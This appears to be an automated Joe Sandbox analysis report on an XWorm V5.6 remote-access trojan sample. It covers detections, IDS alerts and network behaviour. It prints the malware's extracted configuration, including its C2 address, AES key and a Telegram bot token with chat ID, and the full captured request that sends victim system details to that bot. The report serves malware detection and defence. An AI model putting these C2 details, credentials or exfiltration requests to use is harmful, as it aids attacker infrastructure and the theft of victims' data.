                            2024-12-05T19:41:55.895664+010028531931Malware Command and Control Activity Detected192.168.2.449742185.196.8.2397000TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: file.exeAvira: detected
                            Found malware configuration
                            Source: 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["185.196.8.239"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "8070077125:AAEdRIyp1anHye9Y0jcV8uNF6U4mmijN8Pk", "Telegram Chatid": "1818813749", "Version": "XWorm V5.6"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\file.exeReversingLabs: Detection: 47%
                            Source: C:\Users\user\WindowsUpdaterConf.exeReversingLabs: Detection: 47%
                            Multi AV Scanner detection for submitted file
                            Source: file.exeReversingLabs: Detection: 47%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for sample
                            Source: file.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 1.2.file.exe.400000.0.unpackString decryptor: 185.196.8.239
                            Source: 1.2.file.exe.400000.0.unpackString decryptor: 7000
                            Source: 1.2.file.exe.400000.0.unpackString decryptor: <123456789>
                            Source: 1.2.file.exe.400000.0.unpackString decryptor: <Xwormmm>
                            Source: 1.2.file.exe.400000.0.unpackString decryptor: XWorm V5.6
                            Source: 1.2.file.exe.400000.0.unpackString decryptor: USB.exe
                            Source: 1.2.file.exe.400000.0.unpackString decryptor: %Userprofile%
                            Source: 1.2.file.exe.400000.0.unpackString decryptor: WindowsUpdaterConf.exe
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
                            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: mscorlib.pdba source: WER3CD5.tmp.dmp.42.dr
                            Source: Binary string: System.Management.pdbTz source: WERB32D.tmp.dmp.19.dr
                            Source: Binary string: System.pdbMZ@ source: WER5266.tmp.dmp.39.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: mscorlib.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: mscorlib.pdbSystem.Management.ni.dll source: WERB32D.tmp.dmp.19.dr
                            Source: Binary string: System.ni.pdbRSDS source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.pdbL0 source: WER5266.tmp.dmp.39.dr
                            Source: Binary string: mscorlib.ni.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.Management.ni.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: mscorlib.ni.pdbRSDS source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.ni.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr
                            Source: Binary string: System.pdb source: WER5266.tmp.dmp.39.dr, WERB32D.tmp.dmp.19.dr, WERD403.tmp.dmp.24.dr, WERFCA9.tmp.dmp.29.dr, WER3CD5.tmp.dmp.42.dr, WER1C95.tmp.dmp.32.dr, WER3E37.tmp.dmp.35.dr

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49742 -> 185.196.8.239:7000
                            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.196.8.239:7000 -> 192.168.2.4:49742
                            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49742 -> 185.196.8.239:7000
                            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 185.196.8.239:7000 -> 192.168.2.4:49742
                            Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49742 -> 185.196.8.239:7000
                            Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49740 -> 149.154.167.220:443
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: 185.196.8.239
                            Uses the Telegram API (likely for C&C communication)
                            Source: unknownDNS query: name: api.telegram.org
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPE
                            Source: global trafficTCP traffic: 192.168.2.4:49742 -> 185.196.8.239:7000
                            Source: global trafficHTTP traffic detected: GET /bot8070077125:AAEdRIyp1anHye9Y0jcV8uNF6U4mmijN8Pk/sendMessage?chat_id=1818813749&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20YD8OYZ2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 185.196.8.239 185.196.8.239
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.239
                            Source: global trafficHTTP traffic detected: GET /bot8070077125:AAEdRIyp1anHye9Y0jcV8uNF6U4mmijN8Pk/sendMessage?chat_id=1818813749&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20YD8OYZ2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: powershell.exe, 00000006.00000002.1816364705.00000000074A9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1875270222.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1875270222.00000000087C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                            Source: powershell.exe, 0000000C.00000002.1964621290.0000000007F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft/
                            Source: file.exe, 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: powershell.exe, 00000006.00000002.1809974233.0000000005958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1866493773.0000000005DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1941064108.0000000005688000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000006.00000002.1803745466.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: file.exe, 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1803745466.00000000048F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.0000000004691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000006.00000002.1803745466.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: Amcache.hve.29.drString found in binary or memory: http://upx.sf.net
                            Source: powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000009.00000002.1875270222.00000000087C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.(
                            Source: powershell.exe, 00000006.00000002.1802768273.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                            Source: powershell.exe, 00000006.00000002.1803745466.00000000048F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1848689030.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1915480182.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1996515359.0000000004691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
                            Source: file.exe, 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                            Source: powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 00000014.00000002.1996515359.00000000047E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000006.00000002.1809974233.0000000005958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1866493773.0000000005DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1941064108.0000000005688000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2027132554.00000000056F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2

                            Operating System Destruction

                            barindex
                            Protects its processes via BreakOnTermination flag
                            Source: C:\Users\user\Desktop\file.exeProcess information set: 01 00 00 00 Jump to behavior

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 0.2.file.exe.3719ccc.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.file.exe.372e50c.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_031C8D580_2_031C8D58
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_031CEF900_2_031CEF90
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_031CD3E80_2_031CD3E8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_031C0C700_2_031C0C70
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_031C0C600_2_031C0C60
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C47200_2_061C4720
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C1BB80_2_061C1BB8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C24880_2_061C2488
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C47100_2_061C4710
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C18700_2_061C1870
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06288C180_2_06288C18
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06287D680_2_06287D68
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0628F4000_2_0628F400
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011CE1701_2_011CE170
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C97281_2_011C9728
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C47581_2_011C4758
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011CD6281_2_011CD628
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C19781_2_011C1978
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C4D701_2_011C4D70
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C8E581_2_011C8E58
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C8B101_2_011C8B10
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0485B4906_2_0485B490
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04C6B4909_2_04C6B490
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08C53E989_2_08C53E98
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00A6B49012_2_00A6B490
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 14_2_032F0FAA14_2_032F0FAA
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 14_2_032FEF9014_2_032FEF90
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 14_2_032FD3E814_2_032FD3E8
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 14_2_032F0C6014_2_032F0C60
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 14_2_032F0C7014_2_032F0C70
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 14_2_06411BB814_2_06411BB8
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 14_2_0641248814_2_06412488
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 14_2_0641187014_2_06411870
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 14_2_064D8C1814_2_064D8C18
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 14_2_064DF40014_2_064DF400
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00BBB49820_2_00BBB498
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00BBB48820_2_00BBB488
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_081D3AA820_2_081D3AA8
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_00D78D5822_2_00D78D58
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_00D70C7022_2_00D70C70
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_00D70C6022_2_00D70C60
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_00D7198A22_2_00D7198A
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_00D7D3E822_2_00D7D3E8
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_00D7EF9022_2_00D7EF90
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_00D70FAA22_2_00D70FAA
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_0568248822_2_05682488
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_05681BB822_2_05681BB8
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_0568187022_2_05681870
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_05748C1822_2_05748C18
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_0574F40022_2_0574F400
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 27_2_00EED3E827_2_00EED3E8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 27_2_00EE0C7027_2_00EE0C70
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 27_2_00EE0FAA27_2_00EE0FAA
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 27_2_00EEEF9027_2_00EEEF90
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 27_2_058D248827_2_058D2488
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 27_2_058D1BB827_2_058D1BB8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 27_2_058D187027_2_058D1870
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 27_2_05998C1827_2_05998C18
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 27_2_0599F40027_2_0599F400
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_01728D5830_2_01728D58
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_0172198A30_2_0172198A
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_01720C7030_2_01720C70
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_01720C6030_2_01720C60
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_0172D3E830_2_0172D3E8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_0172EF9030_2_0172EF90
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_060D1BB830_2_060D1BB8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_060D248830_2_060D2488
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_060D187030_2_060D1870
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_06198C1830_2_06198C18
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_0619F40030_2_0619F400
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 33_2_01940C7033_2_01940C70
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 33_2_01940C6033_2_01940C60
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 33_2_0194EF9033_2_0194EF90
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 33_2_0194D3E833_2_0194D3E8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 33_2_02391BB833_2_02391BB8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 33_2_0239248833_2_02392488
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 33_2_0239187033_2_02391870
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 33_2_06568C1833_2_06568C18
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 33_2_0656F40033_2_0656F400
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 37_2_0328EF9037_2_0328EF90
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 37_2_0328D3E837_2_0328D3E8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 37_2_03280C6037_2_03280C60
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 37_2_03280C7037_2_03280C70
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 37_2_06241BB837_2_06241BB8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 37_2_0624248837_2_06242488
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 37_2_0624187037_2_06241870
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 37_2_06308C1837_2_06308C18
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 37_2_0630F40037_2_0630F400
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_01850C6040_2_01850C60
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_01850C7040_2_01850C70
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_0185EF9040_2_0185EF90
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_0185D3E840_2_0185D3E8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_060A1BB840_2_060A1BB8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_060A248840_2_060A2488
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_060A187040_2_060A1870
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_06168C1840_2_06168C18
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 40_2_0616F40040_2_0616F400
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 43_2_0300D3E843_2_0300D3E8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 43_2_03000C6043_2_03000C60
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 43_2_03000C7043_2_03000C70
                            Source: C:\Users\user\AppData\Roaming\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 1216
